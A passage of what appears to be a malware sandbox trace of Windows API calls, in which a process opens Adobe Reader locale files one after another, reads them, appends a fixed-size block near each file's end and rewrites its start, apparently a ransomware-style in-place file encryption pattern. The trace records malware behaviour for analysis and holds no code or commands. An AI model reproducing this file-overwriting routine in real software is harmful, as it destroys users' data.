lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3600 [0081.442] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.442] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.442] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.442] CloseHandle (hObject=0x1e4) returned 1 [0081.443] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\RdLang32.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\rdlang32.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.461] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.461] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x140400 [0081.461] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.461] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.462] ReleaseMutex (hMutex=0x168) returned 1 [0081.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.NOR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.NOR", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.NOR", lpUsedDefaultChar=0x0) returned 12 [0081.462] ReadFile (in: hFile=0x1d8, lpBuffer=0x28b3948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x28b3948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0081.510] ReadFile (in: hFile=0x1d8, lpBuffer=0x28b3948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x28b3948*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.571] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x13f400 [0081.571] ReadFile (in: hFile=0x1d8, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.587] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x13f400 [0081.588] WriteFile (in: hFile=0x1d8, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.588] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.588] WriteFile (in: hFile=0x1d8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0081.590] WriteFile (in: hFile=0x1d8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.590] CloseHandle (hObject=0x1d8) returned 1 [0081.590] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Spelling.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\spelling.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.605] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.605] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2800 [0081.605] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.605] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.605] ReleaseMutex (hMutex=0x168) returned 1 [0081.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.NOR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.NOR", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.NOR", lpUsedDefaultChar=0x0) returned 12 [0081.606] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.618] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1800 [0081.619] ReadFile (in: hFile=0x1e4, lpBuffer=0x2696e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.635] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1800 [0081.635] WriteFile (in: hFile=0x1e4, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.636] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.636] WriteFile (in: hFile=0x1e4, lpBuffer=0x2696e48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2696e48*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.636] CloseHandle (hObject=0x1e4) returned 1 [0081.636] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Checkers.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\checkers.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.637] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.637] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1f400 [0081.637] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.637] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.637] ReleaseMutex (hMutex=0x168) returned 1 [0081.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.NLD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.NLD", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.NLD", lpUsedDefaultChar=0x0) returned 12 [0081.638] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0081.647] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1e400 [0081.648] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.656] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1e400 [0081.657] WriteFile (in: hFile=0x1e4, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.657] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.657] WriteFile (in: hFile=0x1e4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.657] CloseHandle (hObject=0x1e4) returned 1 [0081.658] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\pddom.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\pddom.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.663] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.663] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2c00 [0081.664] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.664] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.664] ReleaseMutex (hMutex=0x168) returned 1 [0081.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.NLD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.NLD", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.NLD", lpUsedDefaultChar=0x0) returned 9 [0081.664] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.672] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1c00 [0081.673] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.688] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1c00 [0081.689] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.689] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.689] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.689] CloseHandle (hObject=0x1cc) returned 1 [0081.690] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.690] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.690] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x924e [0081.690] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.691] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.691] ReleaseMutex (hMutex=0x168) returned 1 [0081.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0081.691] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0081.701] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x824e [0081.701] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.710] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x824e [0081.710] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.710] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.710] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.710] CloseHandle (hObject=0x1cc) returned 1 [0081.710] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Annots.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\annots.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.711] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.711] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7bc00 [0081.711] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.711] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.711] ReleaseMutex (hMutex=0x168) returned 1 [0081.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.POL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.POL", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.POL", lpUsedDefaultChar=0x0) returned 10 [0081.712] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0081.716] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7ac00 [0081.717] ReadFile (in: hFile=0x1cc, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.723] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7ac00 [0081.724] WriteFile (in: hFile=0x1cc, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.724] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.725] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0081.725] CloseHandle (hObject=0x1cc) returned 1 [0081.725] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\makeaccessible.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\makeaccessible.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.729] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.729] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x12400 [0081.729] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.729] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.730] ReleaseMutex (hMutex=0x168) returned 1 [0081.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.POL", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0081.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.POL", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.POL", lpUsedDefaultChar=0x0) returned 18 [0081.730] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0082.015] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x11400 [0082.016] ReadFile (in: hFile=0x1fc, lpBuffer=0x2696e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0082.051] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x11400 [0082.052] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.052] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0082.052] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.052] CloseHandle (hObject=0x1fc) returned 1 [0082.052] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Search.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\search.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0082.053] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0082.053] SetFilePointer (in: 